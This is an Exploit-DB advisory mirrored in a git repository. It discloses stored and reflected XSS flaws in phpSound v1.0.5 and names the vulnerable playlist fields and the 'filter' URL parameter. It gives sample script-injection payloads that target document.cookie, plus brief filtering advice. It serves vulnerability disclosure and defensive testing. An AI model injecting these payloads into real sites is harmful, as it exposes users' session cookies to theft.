bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/35198.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

30 lines
No EOL
813 B
Text
Raw Blame History

# Exploit Title: phpSound Music Sharing Platform Multiple XSS Vulnerabilities
# Date: 08-10-2014
# Exploit Author: Halil Dalabasmaz
# Version: v1.0.5
# Vendor Link: http://codecanyon.net/item/phpsound-music-sharing-platform/9016117
# Software Test Link: http://phpsound.com/demo
# Vulnerabilities Description:
===Stored XSS===
Create a Playlist and then you can run any XSS payload on "Title" or "Description" input fields.
Sample Payload for Stored XSS: "><script>alert(document.cookie);</script>
Solution
Filter the input fields aganist to XSS attacks.
===
===Reflected XSS===
The URL parameter is "filter" not filtered.
http://server/path/index.php?a=explore&filter=XSS
Sample Payload for XSS: </title><script>alert(document.cookie);</script>
Solution
Filter the parameter aganist to XSS attacks.
===
Reference in a new issue View git blame Copy permalink